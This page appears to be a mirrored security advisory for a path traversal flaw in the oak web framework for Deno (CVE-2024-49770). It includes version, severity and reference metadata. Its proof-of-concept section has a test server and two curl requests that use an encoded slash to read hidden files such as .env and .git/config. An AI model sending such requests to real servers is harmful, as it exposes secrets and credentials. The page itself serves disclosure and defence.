Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1xbTkyLTkzZnYtdmg3bc4ABA6P
Path traversal in oak allows transfer of hidden files within the served root directory
Summary
By default oak does not allow transferring of hidden files with Context.send API. However, this can be bypassed by
encoding / as its URL encoded form %2F.
Details
1.) Oak uses decodeComponent which seems to be unexpected. This is also the reason why it is not possible to access a file that
contains URL encoded characters unless the client URL encodes it first.
2.) The function isHidden is flawed since it only checks if the first subpath is hidden, allowing secrets to be read from subdir/.env.
PoC
// server.ts
import { Application } from "jsr:@oak/[email protected]";
const app = new Application();
app.use(async (context, next) => {
try {
await context.send({
root: './root',
hidden: false, // default
});
} catch {
await next();
}
});
await app.listen({ port: 8000 });
In terminal:
# setup root directory
mkdir root/.git
echo SECRET_KEY=oops > root/.env
echo oops > root/.git/config
# start server
deno run -A server.ts
# in another terminal
curl -D- http://127.0.0.1:8000/poc%2f../.env
curl -D- http://127.0.0.1:8000/poc%2f../.git/config
Impact
For an attacker this has potential to read sensitive user data or to gain access to server secrets.
Permalink: https://github.com/advisories/GHSA-qm92-93fv-vh7mJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xbTkyLTkzZnYtdmg3bc4ABA6P
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 5 days ago
Updated: 5 days ago
CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-qm92-93fv-vh7m, CVE-2024-49770
References:
- https://github.com/oakserver/oak/security/advisories/GHSA-qm92-93fv-vh7m
- https://nvd.nist.gov/vuln/detail/CVE-2024-49770
- https://github.com/oakserver/oak/commit/4b2f27efd5cba5a45b2c3982e610da3af0869209
- https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L117-L125
- https://github.com/oakserver/oak/blob/3896fe568b25ac0b4c5afbf822ff8344c3d1712a/send.ts#L182C10-L182C25
- https://github.com/advisories/GHSA-qm92-93fv-vh7m
Blast Radius: 0.0
Affected Packages
npm:@oakserver/oak
Dependent packages: 2Dependent repositories: 1
Downloads: 2,371 last month
Affected Version Ranges: <= 14.1.0
No known fixed version
All affected versions: 10.3.0, 10.4.0, 10.5.0, 10.5.1, 10.6.0, 11.0.0, 12.0.1, 12.1.0, 12.2.0, 12.3.0, 12.3.1, 12.4.0, 12.5.0, 12.6.0, 12.6.1, 12.6.2, 13.0.0, 13.1.0, 13.2.0, 13.2.1, 13.2.2, 13.2.3, 13.2.4, 13.2.5, 14.0.0, 14.1.0